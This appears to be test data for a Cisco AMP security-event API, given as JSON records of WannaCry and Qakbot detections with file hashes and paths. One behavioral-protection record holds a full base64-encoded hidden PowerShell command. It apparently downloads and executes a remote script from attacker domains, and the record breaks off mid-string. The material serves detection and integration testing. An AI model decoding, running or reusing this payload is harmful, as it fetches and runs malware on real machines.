-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgA